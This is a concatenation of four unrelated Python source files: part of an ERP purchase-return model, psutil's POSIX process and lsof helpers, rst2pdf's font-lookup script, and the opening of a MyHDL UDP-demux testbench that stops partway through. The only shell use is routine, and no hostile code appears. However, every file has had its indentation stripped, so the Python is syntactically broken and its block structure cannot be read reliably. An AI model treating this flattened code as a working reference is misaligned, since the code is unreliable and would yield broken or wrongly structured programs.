line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
line["description"] = prod.description
line["qty"] = 1
if prod.uom_id is not None:
line["uom_id"] = prod.uom_id.id
pricelist_id = data["price_list_id"]
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, 1)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.purchase_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
if prod.purchase_tax_id is not None:
line["tax_id"] = prod.purchase_tax_id.id
if prod.location_id:
line["location_id"] = prod.location_id.id
data = self.update_amounts(context)
return data
def onchange_qty(self, context):
data = context["data"]
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
pricelist_id = data["price_list_id"]
qty = line["qty"]
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, qty)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.purchase_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
data = self.update_amounts(context)
return data
def copy_to_picking(self, ids, context):
id = ids[0]
obj = self.browse(id)
contact = obj.contact_id
pick_vals = {
"type": "out",
"ref": obj.number,
"related_id": "purchase.return,%s" % obj.id,
"contact_id": contact.id,
"currency_id": obj.currency_id.id,
"lines": [],
}
if contact and contact.pick_in_journal_id:
pick_vals["journal_id"] = contact.pick_in_journal_id.id
res = get_model("stock.location").search([["type", "=", "supplier"]],order="id")
if not res:
raise Exception("Supplier location not found")
supp_loc_id = res[0]
res = get_model("stock.location").search([["type", "=", "internal"]])
if not res:
raise Exception("Warehouse not found")
wh_loc_id = res[0]
for line in obj.lines:
prod = line.product_id
if prod.type not in ("stock", "consumable"):
continue
remain_qty = line.qty - line.qty_issued
if remain_qty <= 0:
continue
line_vals = {
"product_id": prod.id,
"qty": remain_qty,
"uom_id": line.uom_id.id,
"base_price": line.unit_price,
"location_from_id": line.location_id.id or wh_loc_id,
"location_to_id": supp_loc_id,
"related_id": "purchase.return,%s" % obj.id,
}
pick_vals["lines"].append(("create", line_vals))
if not pick_vals["lines"]:
raise Exception("Nothing left to receive")
pick_id = get_model("stock.picking").create(pick_vals, {"pick_type": "out"})
pick = get_model("stock.picking").browse(pick_id)
return {
"next": {
"name": "pick_out",
"mode": "form",
"active_id": pick_id,
},
"flash": "Goods issue %s created from purchase return %s" % (pick.number, obj.number),
}
def copy_to_credit_note(self, ids, context={}):
id = ids[0]
obj = self.browse(id)
contact = obj.contact_id
inv_vals = {
"type": "in",
"inv_type": "credit",
"ref": obj.number,
"related_id": "purchase.return,%s" % obj.id,
"contact_id": obj.contact_id.id,
"currency_id": obj.currency_id.id,
"lines": [],
"tax_type": obj.tax_type,
}
if contact.purchase_journal_id:
inv_vals["journal_id"] = contact.purchase_journal_id.id
if contact.purchase_journal_id.sequence_id:
inv_vals["sequence_id"] = contact.purchase_journal_id.sequence_id.id
for line in obj.lines:
prod = line.product_id
remain_qty = line.qty - line.qty_invoiced
if remain_qty <= 0:
continue
line_vals = {
"product_id": prod.id,
"description": line.description,
"qty": remain_qty,
"uom_id": line.uom_id.id,
"unit_price": line.unit_price,
"account_id": prod and prod.purchase_account_id.id or None,
"tax_id": line.tax_id.id,
"amount": line.amount,
}
inv_vals["lines"].append(("create", line_vals))
if not inv_vals["lines"]:
raise Exception("Nothing left to invoice")
inv_id = get_model("account.invoice").create(inv_vals, {"type": "in", "inv_type": "invoice"})
inv = get_model("account.invoice").browse(inv_id)
return {
"next": {
"name": "view_invoice",
"active_id": inv_id,
},
"flash": "Credit note %s created from purchase return %s" % (inv.number, obj.number),
}
def get_delivered(self, ids, context={}):
vals = {}
#import pdb; pdb.set_trace()
for obj in self.browse(ids):
is_delivered = True
for line in obj.lines:
prod = line.product_id
if prod.type not in ("stock", "consumable"):
continue
remain_qty = line.qty - line.qty_issued
if remain_qty > 0:
is_delivered = False
break
vals[obj.id] = is_delivered
return vals
def get_paid(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
amt_paid = 0
for inv in obj.invoices:
if inv.state != "paid":
continue
amt_paid += inv.amount_total
is_paid = amt_paid >= obj.amount_total
vals[obj.id] = is_paid
return vals
def void(self, ids, context={}):
obj = self.browse(ids)[0]
for pick in obj.pickings:
if pick.state != "voided":
raise Exception("There are still goods receipts for this purchase order")
for inv in obj.invoices:
if inv.state != "voided":
raise Exception("There are still invoices for this purchase order")
obj.write({"state": "voided"})
def get_invoices(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
inv_ids = []
for inv_line in obj.invoice_lines:
inv_id = inv_line.invoice_id.id
if inv_id not in inv_ids:
inv_ids.append(inv_id)
vals[obj.id] = inv_ids
return vals
def get_pickings(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
pick_ids = []
for move in obj.stock_moves:
pick_id = move.picking_id.id
if pick_id not in pick_ids:
pick_ids.append(pick_id)
vals[obj.id] = pick_ids
return vals
def onchange_contact(self, context):
data = context["data"]
contact_id = data.get("contact_id")
if not contact_id:
return {}
contact = get_model("contact").browse(contact_id)
data["payment_terms"] = contact.payment_terms
data["price_list_id"] = contact.purchase_price_list_id.id
return data
def onchange_sequence(self, context={}):
data = context["data"]
seq_id = data["sequence_id"]
if not seq_id:
return None
while 1:
num = get_model("sequence").get_next_number(seq_id, context=context)
res = self.search([["number", "=", num]])
if not res:
break
get_model("sequence").increment_number(seq_id, context=context)
data["number"] = num
return data
def delete(self, ids, **kw):
for obj in self.browse(ids):
if obj.state in ("confirmed", "done"):
raise Exception("Can not delete purchase return in this status")
super().delete(ids, **kw)
PurchaseReturn.register()
|
|
#!/usr/bin/env python
#
# $Id: _psposix.py 1342 2012-06-10 22:43:25Z g.rodola $
#
# Copyright (c) 2009, Jay Loden, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Routines common to all posix systems."""
import os
import errno
import subprocess
import psutil
import socket
import re
import sys
import warnings
import time
import glob
from psutil.error import AccessDenied, NoSuchProcess, TimeoutExpired
from psutil._compat import PY3, namedtuple
from psutil._common import nt_diskinfo, usage_percent
def pid_exists(pid):
"""Check whether pid exists in the current process table."""
if not isinstance(pid, int):
raise TypeError('an integer is required')
if pid < 0:
return False
try:
os.kill(pid, 0)
except OSError:
e = sys.exc_info()[1]
return e.errno == errno.EPERM
else:
return True
def wait_pid(pid, timeout=None):
"""Wait for process with pid 'pid' to terminate and return its
exit status code as an integer.
If pid is not a children of os.getpid() (current process) just
waits until the process disappears and return None.
If pid does not exist at all return None immediately.
Raise TimeoutExpired on timeout expired.
"""
def check_timeout(delay):
if timeout is not None:
if time.time() >= stop_at:
raise TimeoutExpired(pid)
time.sleep(delay)
return min(delay * 2, 0.04)
if timeout is not None:
waitcall = lambda: os.waitpid(pid, os.WNOHANG)
stop_at = time.time() + timeout
else:
waitcall = lambda: os.waitpid(pid, 0)
delay = 0.0001
while 1:
try:
retpid, status = waitcall()
except OSError:
err = sys.exc_info()[1]
if err.errno == errno.EINTR:
delay = check_timeout(delay)
continue
elif err.errno == errno.ECHILD:
# This has two meanings:
# - pid is not a child of os.getpid() in which case
# we keep polling until it's gone
# - pid never existed in the first place
# In both cases we'll eventually return None as we
# can't determine its exit status code.
while 1:
if pid_exists(pid):
delay = check_timeout(delay)
else:
return
else:
raise
else:
if retpid == 0:
# WNOHANG was used, pid is still running
delay = check_timeout(delay)
continue
# process exited due to a signal; return the integer of
# that signal
if os.WIFSIGNALED(status):
return os.WTERMSIG(status)
# process exited using exit(2) system call; return the
# integer exit(2) system call has been called with
elif os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
# should never happen
raise RuntimeError("unknown process exit status")
def get_disk_usage(path):
"""Return disk usage associated with path."""
st = os.statvfs(path)
free = (st.f_bavail * st.f_frsize)
total = (st.f_blocks * st.f_frsize)
used = (st.f_blocks - st.f_bfree) * st.f_frsize
percent = usage_percent(used, total, _round=1)
# NB: the percentage is -5% than what shown by df due to
# reserved blocks that we are currently not considering:
# http://goo.gl/sWGbH
return nt_diskinfo(total, used, free, percent)
def _get_terminal_map():
ret = {}
ls = glob.glob('/dev/tty*') + glob.glob('/dev/pts/*')
for name in ls:
assert name not in ret
ret[os.stat(name).st_rdev] = name
return ret
class LsofParser:
"""A wrapper for lsof command line utility.
Executes lsof in subprocess and parses its output.
"""
socket_table = {'TCP' : socket.SOCK_STREAM,
'UDP' : socket.SOCK_DGRAM,
'IPv4' : socket.AF_INET,
'IPv6' : socket.AF_INET6}
_openfile_ntuple = namedtuple('openfile', 'path fd')
_connection_ntuple = namedtuple('connection', 'fd family type local_address '
'remote_address status')
def __init__(self, pid, name):
self.pid = pid
self.process_name = name
# XXX - this is no longer used
def get_process_open_files(self):
"""Return files opened by process by parsing lsof output."""
# Options:
# -i == network files only
# -a == ANDing of all options
# -p == process with given PID only
# -n == do not resolve IP addresses
# -P == do not resolve port numbers
# -w == suppresses warnings
# -F0nPt == (0) separate lines with "\x00"
# (n) file name
# (t) file type
# (f) file descriptr
cmd = "lsof -a -p %s -n -P -F0ftn" % self.pid
stdout = self.runcmd(cmd)
if not stdout:
return []
files = []
lines = stdout.split("\n")
del lines[0] # first line contains the PID
for line in lines:
if not line:
continue
line = line.strip("\x00")
fields = {}
for field in line.split("\x00"):
key, value = field[0], field[1:]
fields[key] = value
if not 't' in fields:
continue
_type = fields['t']
fd = fields['f']
name = fields['n']
if 'REG' in _type and fd.isdigit():
if not os.path.isfile(os.path.realpath(name)):
continue
ntuple = self._openfile_ntuple(name, int(fd))
files.append(ntuple)
return files
def get_process_connections(self):
"""Return connections opened by a process by parsing lsof output."""
# Options:
# -i == network files only
# -a == ANDing of all options
# -p == process with given PID only
# -n == do not resolve IP addresses
# -P == do not resolve port numbers
# -w == suppresses warnings
# -F0nPt == (0) separate lines with "\x00"
# (n) and show internet addresses only
# (P) protocol type (TCP, UPD, Unix)
# (t) socket family (IPv4, IPv6)
# (T) connection status
# (f) file descriptors
cmd = "lsof -p %s -i -a -F0nPtTf -n -P" % self.pid
stdout = self.runcmd(cmd)
if not stdout:
return []
connections = []
lines = stdout.split()
del lines[0] # first line contains the PID
for line in lines:
line = line.strip("\x00")
fields = {}
for field in line.split("\x00"):
if field.startswith('T'):
key, value = field.split('=')
else:
key, value = field[0], field[1:]
fields[key] = value
# XXX - might trow execption; needs "continue on unsupported
# family or type" (e.g. unix sockets)
# we consider TCP and UDP sockets only
stype = fields['P']
if stype not in self.socket_table:
continue
else:
_type = self.socket_table[fields['P']]
family = self.socket_table[fields['t']]
peers = fields['n']
fd = int(fields['f'])
if _type == socket.SOCK_STREAM:
status = fields['TST']
# OS X shows "CLOSED" instead of "CLOSE" so translate them
if status == "CLOSED":
status = "CLOSE"
else:
status = ""
if not '->' in peers:
local_addr = self._normaddress(peers, family)
remote_addr = ()
# OS X processes e.g. SystemUIServer can return *:* for local
# address, so we return 0 and move on
if local_addr == 0:
continue
else:
local_addr, remote_addr = peers.split("->")
local_addr = self._normaddress(local_addr, family)
remote_addr = self._normaddress(remote_addr, family)
conn = self._connection_ntuple(fd, family, _type, local_addr,
remote_addr, status)
connections.append(conn)
return connections
def runcmd(self, cmd):
"""Expects an lsof-related command line, execute it in a
subprocess and return its output.
If something goes bad stderr is parsed and proper exceptions
raised as necessary.
"""
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if PY3:
stdout, stderr = [x.decode(sys.stdout.encoding)
for x in (stdout, stderr)]
if stderr:
utility = cmd.split(' ')[0]
if self._which(utility) is None:
msg = "this functionnality requires %s command line utility " \
"to be installed on the system" % utility
raise NotImplementedError(msg)
elif "permission denied" in stderr.lower():
# "permission denied" can be found also in case of zombie
# processes;
p = psutil.Process(self.pid)
if not p.is_running():
raise NoSuchProcess(self.pid, self.process_name)
raise AccessDenied(self.pid, self.process_name)
elif "lsof: warning:" in stderr.lower():
# usually appears when lsof is run for the first time and
# complains about missing cache file in user home
warnings.warn(stderr, RuntimeWarning)
else:
# this must be considered an application bug
raise RuntimeError(stderr)
if not stdout:
p = psutil.Process(self.pid)
if not p.is_running():
raise NoSuchProcess(self.pid, self.process_name)
return ""
return stdout
@staticmethod
def _which(program):
"""Same as UNIX which command. Return None on command not found."""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
@staticmethod
def _normaddress(addr, family):
"""Normalize an IP address."""
assert family in (socket.AF_INET, socket.AF_INET6), "unsupported family"
if family == socket.AF_INET:
ip, port = addr.split(':')
else:
if "]" in addr:
ip, port = re.findall('\[([^]]+)\]:([0-9]+)', addr)[0]
else:
ip, port = addr.split(':')
if ip == '*':
if family == socket.AF_INET:
ip = "0.0.0.0"
elif family == socket.AF_INET6:
ip = "::"
# OS X can have some procs e.g. SystemUIServer listening on *:*
else:
raise ValueError("invalid IP %s" %addr)
if port == "*":
return 0
return (ip, int(port))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# See LICENSE.txt for licensing terms
"""
Scan a list of folders and find all .afm files,
then create rst2pdf-ready font-aliases.
"""
import os
import sys
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import (
TTFont,
TTFontFile,
TTFError,
FF_FORCEBOLD,
FF_ITALIC
)
from reportlab.lib.fonts import addMapping
from rst2pdf.log import log
flist = []
afmList = []
pfbList = {}
ttfList = []
# Aliases defined by GhostScript, so if you use Palatino or whatever you
# may get **something**. They are family name aliases.
Alias = {
'itc bookman': 'urw bookman l',
'itc avant garde gothic': 'urw gothic l',
'palatino': 'urw palladio l',
'new century schoolbook': 'century schoolbook l',
'itc zapf chancery': 'urw chancery l'
}
# Standard PDF fonts, so no need to embed them
Ignored = ['times', 'itc zapf dingbats', 'symbol', 'helvetica', 'courier']
fonts = {}
families = {}
fontMappings = {}
def loadFonts():
"""
Search the system and build lists of available fonts.
"""
if not afmList and not pfbList and not ttfList:
# Find all ".afm" and ".pfb" files files
for root in flist:
for folder, _, names in os.walk(root):
for f in names:
ext = os.path.splitext(f)[-1]
if ext in ['.ttf', '.ttc']:
ttfList.append(os.path.join(folder, f))
if ext == '.afm':
afmList.append(os.path.join(folder, f))
if ext == '.pfb':
pfbList[f[:-4]] = os.path.join(folder, f)
for ttf in ttfList:
#Find out how to process these
try:
font = TTFontFile(ttf)
except TTFError:
continue
family = font.familyName.lower().decode()
fontName = font.name.decode()
baseName = os.path.basename(ttf)[:-4]
fullName = font.fullName.decode()
fonts[fontName.lower()] = (ttf, ttf, family)
fonts[fullName.lower()] = (ttf, ttf, family)
fonts[fullName.lower().replace('italic', 'oblique')] = (ttf, ttf, family)
bold = (FF_FORCEBOLD == FF_FORCEBOLD & font.flags)
italic = (FF_ITALIC == FF_ITALIC & font.flags)
# And we can try to build/fill the family mapping
if family not in families:
families[family] = [fontName, fontName, fontName, fontName]
if bold and italic:
families[family][3] = fontName
elif bold:
families[family][1] = fontName
elif italic:
families[family][2] = fontName
# FIXME: what happens if there are Demi and Medium
# weights? We get a random one.
else:
families[family][0] = fontName
# Now we have full afm and pbf lists, process the
# afm list to figure out family name, weight and if
# it's italic or not, as well as where the
# matching pfb file is
for afm in afmList:
family = None
fontName = None
italic = False
bold = False
for line in open(afm, 'r'):
line = line.strip()
if line.startswith('StartCharMetrics'):
break
elif line.startswith('FamilyName'):
family = ' '.join(line.split(' ')[1:]).lower()
elif line.startswith('FontName'):
fontName = line.split(' ')[1]
# TODO: find a way to alias the fullname to this font
# so you can use names like "Bitstream Charter Italic"
elif line.startswith('FullName'):
fullName = ' '.join(line.split(' ')[1:])
elif line.startswith('Weight'):
w = line.split(' ')[1]
if w == 'Bold':
bold = True
elif line.startswith('ItalicAngle'):
if line.split(' ')[1] != '0.0':
italic = True
baseName = os.path.basename(afm)[:-4]
if family in Ignored:
continue
if family in Alias:
continue
if baseName not in pfbList:
log.info("afm file without matching pfb file: %s" % baseName)
continue
# So now we have a font we know we can embed.
fonts[fontName.lower()] = (afm, pfbList[baseName], family)
fonts[fullName.lower()] = (afm, pfbList[baseName], family)
fonts[fullName.lower().replace('italic', 'oblique')] = \
(afm, pfbList[baseName], family)
# And we can try to build/fill the family mapping
if family not in families:
families[family] = [fontName, fontName, fontName, fontName]
if bold and italic:
families[family][3] = fontName
elif bold:
families[family][1] = fontName
elif italic:
families[family][2] = fontName
# FIXME: what happens if there are Demi and Medium
# weights? We get a random one.
else:
families[family][0] = fontName
def findFont(fname):
loadFonts()
# So now we are sure we know the families and font
# names. Well, return some data!
fname = fname.lower()
if fname in fonts:
font = fonts[fname.lower()]
else:
if fname in Alias:
fname = Alias[fname]
if fname in families:
font = fonts[families[fname][0].lower()]
else:
return None
return font
def findTTFont(fname):
def get_family(query):
data = os.popen("fc-match \"%s\"" % query, "r").read()
for line in data.splitlines():
line = line.strip()
if not line:
continue
fname, family, _, variant = line.split('"')[:4]
family = family.replace('"', '')
if family:
return family
return None
def get_fname(query):
data = os.popen("fc-match -v \"%s\"" % query, "r").read()
for line in data.splitlines():
line = line.strip()
if line.startswith("file: "):
return line.split('"')[1]
return None
def get_variants(family):
variants = [
get_fname(family + ":style=Roman"),
get_fname(family + ":style=Bold"),
get_fname(family + ":style=Oblique"),
get_fname(family + ":style=Bold Oblique")]
if variants[2] == variants[0]:
variants[2] = get_fname(family + ":style=Italic")
if variants[3] == variants[0]:
variants[3] = get_fname(family + ":style=Bold Italic")
if variants[0].endswith('.pfb') or variants[0].endswith('.gz'):
return None
return variants
if os.name != 'nt':
family = get_family(fname)
if not family:
log.error("Unknown font: %s", fname)
return None
return get_variants(family)
else:
# lookup required font in registry lookup, alternative approach
# is to let loadFont() traverse windows font directory or use
# ctypes with EnumFontFamiliesEx
def get_nt_fname(ftname):
import winreg as _w
fontkey = _w.OpenKey(
_w.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts"
)
fontname = ftname + " (TrueType)"
try:
fname = _w.QueryValueEx(fontkey, fontname)[0]
if os.path.isabs(fname):
fontkey.close()
return fname
fontdir = os.environ.get("SystemRoot", "C:\\Windows")
fontdir += "\\Fonts"
fontkey.Close()
return fontdir + "\\" + fname
except WindowsError:
fontkey.Close()
return None
family, pos = guessFont(fname)
fontfile = get_nt_fname(fname)
if not fontfile:
if pos == 0:
fontfile = get_nt_fname(family)
elif pos == 1:
fontfile = get_nt_fname(family + " Bold")
elif pos == 2:
fontfile = get_nt_fname(family + " Italic") or \
get_nt_fname(family + " Oblique")
else:
fontfile = get_nt_fname(family + " Bold Italic") or \
get_nt_fname(family + " Bold Oblique")
if not fontfile:
log.error("Unknown font: %s", fname)
return None
family, pos = guessFont(fname)
variants = [
get_nt_fname(family) or fontfile,
get_nt_fname(family + " Bold") or fontfile,
get_nt_fname(family + " Italic") or
get_nt_fname(family + " Oblique") or fontfile,
get_nt_fname(family + " Bold Italic") or
get_nt_fname(family + " Bold Oblique") or fontfile,
]
return variants
def autoEmbed(fname):
"""
Given a font name, do a best-effort of embedding the font and its variants.
Return a list of the font names it registered with ReportLab.
"""
log.info('Trying to embed %s' % fname)
fontList = []
variants = []
font = findFont(fname)
if font: # We have this font located
if font[0].lower()[-4:] == '.afm': # Type 1 font
family = families[font[2]]
# Register the whole family of faces
faces = [pdfmetrics.EmbeddedType1Face(*fonts[fn.lower()][:2])
for fn in family]
for face in faces:
pdfmetrics.registerTypeFace(face)
for face, name in zip(faces, family):
fontList.append(name)
font = pdfmetrics.Font(face, name, "WinAnsiEncoding")
log.info('Registering font: %s from %s' % (face, name))
pdfmetrics.registerFont(font)
# Map the variants
regular, italic, bold, bolditalic = family
addMapping(fname, 0, 0, regular)
addMapping(fname, 0, 1, italic)
addMapping(fname, 1, 0, bold)
addMapping(fname, 1, 1, bolditalic)
addMapping(regular, 0, 0, regular)
addMapping(regular, 0, 1, italic)
addMapping(regular, 1, 0, bold)
addMapping(regular, 1, 1, bolditalic)
log.info('Embedding as %s' % fontList)
return fontList
else: # A TTF font
variants = [fonts[f.lower()][0] for f in families[font[2]]]
if not variants: # Try fc-match
variants = findTTFont(fname)
# It is a TT Font and we found it using fc-match (or found *something*)
if variants:
for variant in variants:
vname = os.path.basename(variant)[:-4]
try:
if vname not in pdfmetrics._fonts:
_font = TTFont(vname, variant)
log.info('Registering font: %s from %s' % (vname, variant))
pdfmetrics.registerFont(_font)
except TTFError:
log.error('Error registering font: %s from %s' % (vname, variant))
else:
fontList.append(vname)
regular, bold, italic, bolditalic = [
os.path.basename(variant)[:-4] for variant in variants]
addMapping(regular, 0, 0, regular)
addMapping(regular, 0, 1, italic)
addMapping(regular, 1, 0, bold)
addMapping(regular, 1, 1, bolditalic)
log.info('Embedding via findTTFont as %s' % fontList)
return fontList
def guessFont(fname):
"""
Guess what a font name means.
Font names may be, for example, "Tahoma-BoldOblique", "Bitstream Charter
Italic" or "Perpetua Bold Italic".
Returs (family, x) where x is
0: regular
1: bold
2: italic
3: bolditalic
"""
italic = 0
bold = 0
if '-' not in fname:
sfx = {
"Bold": 1,
"Bold Italic": 3,
"Bold Oblique": 3,
"Italic": 2,
"Oblique": 2
}
for key in sfx:
if fname.endswith(" " + key):
return fname.rpartition(key)[0], sfx[key]
return fname, 0
else:
family, mod = fname.rsplit('-', 1)
mod = mod.lower()
if "oblique" in mod or "italic" in mod:
italic = 1
if "bold" in mod:
bold = 1
if bold + italic == 0: # Not really a modifier
return fname, 0
return family, bold + 2 * italic
def main():
global flist
if len(sys.argv) != 2:
print("Usage: findfont fontName")
sys.exit(1)
if os.name == 'nt':
flist = [".", os.environ.get("SystemRoot", "C:\\Windows") + "\\Fonts"]
else:
flist = [".", "/usr/share/fonts", "/usr/share/texmf-dist/fonts"]
fn, pos = guessFont(sys.argv[1])
f = findFont(fn)
if not f:
f = findTTFont(fn)
if f:
print(f)
else:
print("Unknown font %s" % sys.argv[1])
if __name__ == "__main__":
main()
|
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import udp_ep
module = 'udp_demux'
testbench = 'test_%s_64_4' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
M_COUNT = 4
DATA_WIDTH = 64
KEEP_ENABLE = (DATA_WIDTH>8)
KEEP_WIDTH = (DATA_WIDTH/8)
ID_ENABLE = 1
ID_WIDTH = 8
DEST_ENABLE = 1
DEST_WIDTH = 8
USER_ENABLE = 1
USER_WIDTH = 1
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_udp_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_ip_version = Signal(intbv(0)[4:])
s_ip_ihl = Signal(intbv(0)[4:])
s_ip_dscp = Signal(intbv(0)[6:])
s_ip_ecn = Signal(intbv(0)[2:])
s_ip_length = Signal(intbv(0)[16:])
s_ip_identification = Signal(intbv(0)[16:])
s_ip_flags = Signal(intbv(0)[3:])
s_ip_fragment_offset = Signal(intbv(0)[13:])
s_ip_ttl = Signal(intbv(0)[8:])
s_ip_protocol = Signal(intbv(0)[8:])
s_ip_header_checksum = Signal(intbv(0)[16:])
s_ip_source_ip = Signal(intbv(0)[32:])
s_ip_dest_ip = Signal(intbv(0)[32:])
s_udp_source_port = Signal(intbv(0)[16:])
s_udp_dest_port = Signal(intbv(0)[16:])
s_udp_length = Signal(intbv(0)[16:])
s_udp_checksum = Signal(intbv(0)[16:])
s_udp_payload_axis_tdata = Signal(intbv(0)[DATA_WIDTH:])
s_udp_payload_axis_tkeep = Signal(intbv(1)[KEEP_WIDTH:])
s_udp_payload_axis_tvalid = Signal(bool(0))
s_udp_payload_axis_tlast = Signal(bool(0))
s_udp_payload_axis_tid = Signal(intbv(0)[ID_WIDTH:])
s_udp_payload_axis_tdest = Signal(intbv(0)[DEST_WIDTH:])
s_udp_payload_axis_tuser = Signal(intbv(0)[USER_WIDTH:])
m_udp_hdr_ready_list = [Signal(bool(0)) for i in range(M_COUNT)]
m_udp_payload_axis_tready_list = [Signal(bool(0)) for i in range(M_COUNT)]
m_udp_hdr_ready = ConcatSignal(*reversed(m_udp_hdr_ready_list))
m_udp_payload_axis_tready = ConcatSignal(*reversed(m_udp_payload_axis_tready_list))
enable = Signal(bool(0))
drop = Signal(bool(0))
select = Signal(intbv(0)[2:])
# Outputs
s_udp_hdr_ready = Signal(bool(0))
s_udp_payload_axis_tready = Signal(bool(0))
m_udp_hdr_valid = Signal(intbv(0)[M_COUNT:])
m_eth_dest_mac = Signal(intbv(0)[M_COUNT*48:])
m_eth_src_mac = Signal(intbv(0)[M_COUNT*48:])
m_eth_type = Signal(intbv(0)[M_COUNT*16:])
m_ip_version = Signal(intbv(0)[M_COUNT*4:])
m_ip_ihl = Signal(intbv(0)[M_COUNT*4:])
m_ip_dscp = Signal(intbv(0)[M_COUNT*6:])
m_ip_ecn = Signal(intbv(0)[M_COUNT*2:])
m_ip_length = Signal(intbv(0)[M_COUNT*16:])
m_ip_identification = Signal(intbv(0)[M_COUNT*16:])
m_ip_flags = Signal(intbv(0)[M_COUNT*3:])
m_ip_fragment_offset = Signal(intbv(0)[M_COUNT*13:])
m_ip_ttl = Signal(intbv(0)[M_COUNT*8:])
m_ip_protocol = Signal(intbv(0)[M_COUNT*8:])
m_ip_header_checksum = Signal(intbv(0)[M_COUNT*16:])
m_ip_source_ip = Signal(intbv(0)[M_COUNT*32:])
m_ip_dest_ip = Signal(intbv(0)[M_COUNT*32:])
m_udp_source_port = Signal(intbv(0)[M_COUNT*16:])
m_udp_dest_port = Signal(intbv(0)[M_COUNT*16:])
m_udp_length = Signal(intbv(0)[M_COUNT*16:])
m_udp_checksum = Signal(intbv(0)[M_COUNT*16:])
m_udp_payload_axis_tdata = Signal(intbv(0)[M_COUNT*DATA_WIDTH:])
m_udp_payload_axis_tkeep = Signal(intbv(0xf)[M_COUNT*KEEP_WIDTH:])
m_udp_payload_axis_tvalid = Signal(intbv(0)[M_COUNT:])
m_udp_payload_axis_tlast = Signal(intbv(0)[M_COUNT:])
m_udp_payload_axis_tid = Signal(intbv(0)[M_COUNT*ID_WIDTH:])
m_udp_payload_axis_tdest = Signal(intbv(0)[M_COUNT*DEST_WIDTH:])
m_udp_payload_axis_tuser = Signal(intbv(0)[M_COUNT*USER_WIDTH:])
m_udp_hdr_valid_list = [m_udp_hdr_valid(i) for i in range(M_COUNT)]
m_eth_dest_mac_list = [m_eth_dest_mac((i+1)*48, i*48) for i in range(M_COUNT)]
m_eth_src_mac_list = [m_eth_src_mac((i+1)*48, i*48) for i in range(M_COUNT)]
m_eth_type_list = [m_eth_type((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_version_list = [m_ip_version((i+1)*4, i*4) for i in range(M_COUNT)]
m_ip_ihl_list = [m_ip_ihl((i+1)*4, i*4) for i in range(M_COUNT)]
m_ip_dscp_list = [m_ip_dscp((i+1)*6, i*6) for i in range(M_COUNT)]
m_ip_ecn_list = [m_ip_ecn((i+1)*2, i*2) for i in range(M_COUNT)]
m_ip_length_list = [m_ip_length((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_identification_list = [m_ip_identification((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_flags_list = [m_ip_flags((i+1)*3, i*3) for i in range(M_COUNT)]
m_ip_fragment_offset_list = [m_ip_fragment_offset((i+1)*13, i*13) for i in range(M_COUNT)]
m_ip_ttl_list = [m_ip_ttl((i+1)*8, i*8) for i in range(M_COUNT)]
m_ip_protocol_list = [m_ip_protocol((i+1)*8, i*8) for i in range(M_COUNT)]
m_ip_header_checksum_list = [m_ip_header_checksum((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_source_ip_list = [m_ip_source_ip((i+1)*32, i*32) for i in range(M_COUNT)]
m_ip_dest_ip_list = [m_ip_dest_ip((i+1)*32, i*32) for i in range(M_COUNT)]
